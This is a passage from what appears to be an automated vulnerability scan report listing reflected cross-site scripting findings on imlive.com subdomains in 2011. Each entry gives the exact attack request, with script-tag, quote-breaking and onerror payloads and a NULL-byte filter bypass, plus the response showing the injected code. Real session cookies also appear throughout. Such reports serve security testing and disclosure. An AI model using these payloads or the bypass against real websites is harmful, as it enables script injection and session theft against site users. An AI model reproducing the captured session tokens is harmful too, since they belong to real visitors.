X-AspNet-Version: 2.0.50727
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:01 GMT
Connection: close
Content-Length: 23409


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583cfad6"><script>alert(1)</script>6b350e8e83c&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.14. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b38ec'-alert(1)-'84ce48297e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?b38ec'-alert(1)-'84ce48297e3=1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=4g5le3unzktql15523j4vgvl; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4g5le3unzktql15523j4vgvl; path=/; HttpOnly
Set-Cookie: spvdr=vd=ed834416-472f-4af7-b757-36e07f79cd57&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:54 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:54 GMT
Connection: close
Content-Length: 19533
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=cafr.imlive.com&ul=/?b38ec'-alert(1)-'84ce48297e3=1&qs=b38ec'-alert(1)-'84ce48297e3=1&qs=b38ec'-alert(1)-'84ce48297e3=1&iy=dallas&id=44&iu=1&vd=ed834416-472f-4af7-b757-36e07f79cd57';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.15. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5433f"><script>alert(1)</script>d728cbd751f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5433f"><script>alert(1)</script>d728cbd751f=1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:06 GMT
Connection: close
Content-Length: 22643


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="cafr" title="Fran..ais (Canada)" href="http://cafr.imlive.com/" onclick="dAccess('http://cafr.imlive.com/?5433f"><script>alert(1)</script>d728cbd751f=1');return false;" lang="fr-CA" hreflang="fr-CA">
...[SNIP]...

2.16. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d05ee"><script>alert(1)</script>a1533097529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d05ee"><script>alert(1)</script>a1533097529 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?%00d05ee"><script>alert(1)</script>a1533097529=1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=cewkwz45egz5sj55nckzfefj; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cewkwz45egz5sj55nckzfefj; path=/; HttpOnly
Set-Cookie: spvdr=vd=60d7fb6d-8833-413b-b606-2c070cf64a07&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:53 GMT
Connection: close
Content-Length: 20012
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||%00d05ee"><script>alert(1)</script>a1533097529~1');return false;">
...[SNIP]...

2.17. http://cafr.imlive.com/waccess/ [cbname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd05a"><script>alert(1)</script>cbe3a729d46 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=fd05a"><script>alert(1)</script>cbe3a729d46&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:00 GMT
Connection: close
Content-Length: 23731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=fd05a"><script>alert(1)</script>cbe3a729d46&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.18. http://cafr.imlive.com/waccess/ [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8372"><script>alert(1)</script>d63676c4113 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=a8372"><script>alert(1)</script>d63676c4113&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:05 GMT
Connection: close
Content-Length: 23731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=a8372"><script>alert(1)</script>d63676c4113&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.19. http://cafr.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b90b7'onerror%3d'alert(1)'58d5403e5f1 was submitted in the gotopage parameter. This input was echoed as b90b7'onerror='alert(1)'58d5403e5f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=b90b7'onerror%3d'alert(1)'58d5403e5f1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:02 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: icafr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQQQDTD=FAMDOIMABGHKKJABIPAJKPBJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:03 GMT
Connection: close
Content-Length: 8309
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=cafr.imlive.com&ul=/waccess/b90b7'onerror='alert(1)'58d5403e5f1/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://cafr.imlive.com:80/waccess/b90b7'onerror='alert(1)'58d5403e5f1/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.20. http://cafr.imlive.com/waccess/ [promocode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 980ab"><script>alert(1)</script>eacf27c2ca8 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583980ab"><script>alert(1)</script>eacf27c2ca8&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:56 GMT
Connection: close
Content-Length: 23731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583980ab"><script>alert(1)</script>eacf27c2ca8&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.21. http://de.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23d94"><script>alert(1)</script>9f278dc55b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?23d94"><script>alert(1)</script>9f278dc55b9=1 HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=jcjlwv45cdqvuq45jg2ymj55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jcjlwv45cdqvuq45jg2ymj55; path=/; HttpOnly
Set-Cookie: spvdr=vd=a5fba809-a8f8-4ede-a672-0e8009aef27d&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:57 GMT; path=/
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:57 GMT
Connection: close
Content-Length: 19484
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||23d94"><script>alert(1)</script>9f278dc55b9~1');return false;">
...[SNIP]...

2.22. http://de.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 621b5'-alert(1)-'46747e803cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?621b5'-alert(1)-'46747e803cf=1 HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=0j1k2i45sqmefs55bexfj02y; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0j1k2i45sqmefs55bexfj02y; path=/; HttpOnly
Set-Cookie: spvdr=vd=19204602-dd52-49f1-bfdd-42f8de7ee2b0&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:59 GMT; path=/
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:59 GMT
Connection: close
Content-Length: 19083
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=de.imlive.com&ul=/?621b5'-alert(1)-'46747e803cf=1&qs=621b5'-alert(1)-'46747e803cf=1&qs=621b5'-alert(1)-'46747e803cf=1&iu=1&vd=19204602-dd52-49f1-bfdd-42f8de7ee2b0';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefi
...[SNIP]...

2.23. http://de.imlive.com/waccess/ [cbname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e12af"><script>alert(1)</script>f4d60ab8f81 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=e12af"><script>alert(1)</script>f4d60ab8f81&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RpBZF1m2IzH82rPBFJ4in81; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:20 GMT
Connection: close
Content-Length: 23399


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=e12af"><script>alert(1)</script>f4d60ab8f81&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.24. http://de.imlive.com/waccess/ [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee4f7"><script>alert(1)</script>0f4356d3bc3 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=ee4f7"><script>alert(1)</script>0f4356d3bc3&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RpBZF1m2IzH82rPBFJ4in81; path=/
X-Powered-By: vsrv32
